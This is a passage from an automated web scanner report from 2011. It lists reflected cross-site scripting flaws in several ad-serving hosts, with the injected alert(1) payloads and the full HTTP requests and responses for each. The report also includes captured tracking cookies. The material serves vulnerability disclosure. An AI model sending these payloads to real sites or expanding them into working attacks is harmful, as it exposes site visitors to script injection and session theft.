Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-05_13016313581304955545; expires=Sat, 07-May-2016 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13016313581304955545; expires=Mon, 09-May-2011 15:54:05 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='13016313581304955545';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='850d8<script>alert(1)</script>2b3d55e9cdd';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 745f6<script>alert(1)</script>fac915db6fb was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480745f6<script>alert(1)</script>fac915db6fb&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480745f6<script>alert(1)</script>fac915db6fb&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload c9a94<script>alert(1)</script>2de1484b29c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adverc9a94<script>alert(1)</script>2de1484b29c&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverc9a94<script>alert(1)</script>2de1484b29c&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 8057d<script>alert(1)</script>fa805584b51 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19712'-alert(1)-'edff4653ce4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rub_usatoday19712'-alert(1)-'edff4653ce4/;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday19712'-alert(1)-'edff4653ce4/;sz=728x90;net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.11. http://a.collective-media.net/adj/cm.rub_usatoday/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be6a4'-alert(1)-'d35b3f2842c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?&be6a4'-alert(1)-'d35b3f2842c=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 09 May 2011 15:37:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp]?&be6a4'-alert(1)-'d35b3f2842c=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2af5b'-alert(1)-'737101c3cfa was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?2af5b'-alert(1)-'737101c3cfa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp]?2af5b'-alert(1)-'737101c3cfa;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cb2e"-alert(1)-"d8f71e66f7b was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=9cb2e"-alert(1)-"d8f71e66f7b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7479
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:51 GMT
Expires: Mon, 09 May 2011 15:38:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=9cb2e"-alert(1)-"d8f71e66f7bhttps://www.hyatt.com/gp/en/offers/possibilities-promo.jsp?src=agn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscripta
...[SNIP]...

2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81156"-alert(1)-"869df1a9c74 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ81156"-alert(1)-"869df1a9c74&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7509

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ81156"-alert(1)-"869df1a9c74&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
...[SNIP]...

2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]

Summary

Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/N4300.Google/B5350353.10

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7de38"-alert(1)-"0bf768e1cd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-85609413874722597de38"-alert(1)-"0bf768e1cd4&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
